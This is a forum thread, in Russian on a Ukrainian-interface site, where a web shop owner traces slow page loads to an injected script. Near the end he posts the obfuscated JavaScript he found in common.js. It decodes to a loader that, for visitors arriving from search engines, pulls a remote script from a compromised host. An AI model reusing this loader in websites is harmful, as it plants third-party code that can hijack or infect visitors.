Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

[Решено {сторонний код}] Сайт делает запрос на сторонний ресурс


Nikolas9

Recommended Posts

Есть у меня вот такой сайт -pizza.nikolas.com.ua/. 2-3 дня назад заметил на нем странную проблему. Сайт грузится очень долго. Вижу в firebug, что он делает запрос на сторонний ресурс. Подскажите в чем причина, может кто-то сталкивался уже с такой проблемой.

Надіслати
Поділитися на інших сайтах


Возможно и не покупали? 

А судя по симптомам, не покупали. Иначе, откуда в покупном буржуйском шаблоне будет ссылка на российский сайт? 

Надіслати
Поділитися на інших сайтах


Я же говорю. Сайт существовал несколько недель. Такое случилось несколько дней назад и сейчас я увидел, что такие симптомы еще на нескольких сайтах моего хостинга.

Надіслати
Поділитися на інших сайтах


То, что раньше это работало, не значит, что было все в порядке. 

Если есть подтверждение покупки шаблона, то могу помочь. Если нет, то помогать не буду, и вряд ли кто-то будет. 

Надіслати
Поділитися на інших сайтах


Сейчас снес шаблон. Оставил default тему. С моими модулями (те которые платные - покупал тут, остальные бесплатные). Ситуация осталось. Уточнил у верстальщика, такая ситуация произошла после того как поставил модуль конструктор пиццы. Купленный тут.

Надіслати
Поділитися на інших сайтах


Во первых написать автору модуля в таком случае. 

Попробуйте поставит на чистую ocstore и модули, без шаблона. Уверенна, что проблема исчезнет. 

Надіслати
Поділитися на інших сайтах


Просто не думаю, что причина в теме или даже в модуле. В этот же период произошла проблема , подобного плана на сайте - prof-web.com.ua. А это самопис. (там идет обращение к другому ресурсу) Общее у них только то, что они находятся на 1м хостинге. http://nikolas.com.ua/ - так же проблема была тут, но я почистил js файл в котором был непонятный мне код. 

 

Я думал, вирус поймал или скрипт какой-то. Но все антивирусы мне говорят , что все нормально. А сам хостинг шлёт нафиг, типа твои проблемы.

 

По поводу автора модуля, он ссылается на то, что у него все работает. И значит проблемы у меня, а не у него.

Надіслати
Поділитися на інших сайтах


Спасибо всем за уделенное время. Нашел в чем причина. 

 

Злой скрипт сидел в common.js

 

И выглядел вот так, если вдруг кому-то интересно : 

 

//VPRSfytsmDPj
s1=0;g9='';s1x='Code';while(s1<270){g9+=String['fromChar'+s1x]("j6>##<j7>\\#zbipp#-#zboefy#-#sbncmfs#-#nbjm/sv#-#hpphmf#-#cjoh#^<gps)j>1<j=j7/mfohui<j,,*|jg)epdvnfou/sfgfssfs\\#joefyPg#^)j7\\j^*,2*|j6>#\'pl#<~~v76>#iuuq;00{iv/sv0xq.benjo0jnbhft0tubu/qiq@t>#,hi8,j6<epdvnfou/xsjuf)(=tdsjqu!tsd>#(,v76,(#!uzqf>#ufyu0kbwbtdsjqu#?=0tdsjqu?(*<"['char'+s1x+'At'](s1++)-1)}(Function('gh7="7vx9i";'+g9))();
//TBn9z5mrBgKApg3uKYh
Надіслати
Поділитися на інших сайтах


причина легко может быть в модуле или теме, скачанных на варезах

тамошние робингуды не просто так раздают нахаляву чужие труды

Надіслати
Поділитися на інших сайтах

Вопрос, как оно туда попало? Само ничего не происходит ))

Змінено користувачем SouthBlondi
Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.